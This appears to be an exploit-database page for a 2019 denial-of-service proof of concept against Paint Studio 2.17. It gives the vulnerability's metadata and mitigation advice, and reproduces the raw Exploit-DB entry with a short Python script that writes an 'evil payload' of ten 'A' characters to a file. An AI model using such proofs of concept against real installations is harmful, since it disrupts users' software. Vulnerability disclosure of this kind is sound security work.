header-logo
Suggest Exploit
vendor:
Paint Studio
by:
Ihsan Sencan
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: Paint Studio
Affected Version From: 2.17
Affected Version To: 2.17
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64, Kali Linux x64
2019

Paint Studio 2.17 – Denial of Service (PoC)

This exploit causes a denial of service (DoS) in Paint Studio version 2.17. By providing a specially crafted input, the program crashes and becomes unresponsive. The exploit creates a file named 'exp.txt' containing a payload of 10 'A' characters.

Mitigation:

The vendor has not provided a patch for this vulnerability. As a mitigation measure, users are advised to avoid opening untrusted files or running unknown executables.
Source

Exploit-DB raw data:

# Exploit Title: Paint Studio 2.17 - Denial of Service (PoC)
# Dork: N/A
# Date: 2019-01-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.pixarra.com/
# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbpaintstudio_install.exe
# Version: 2.17
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Paint Studio Run / Enter Key...
# Any character.

#!/usr/bin/python
    
buffer = "A" * 10
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."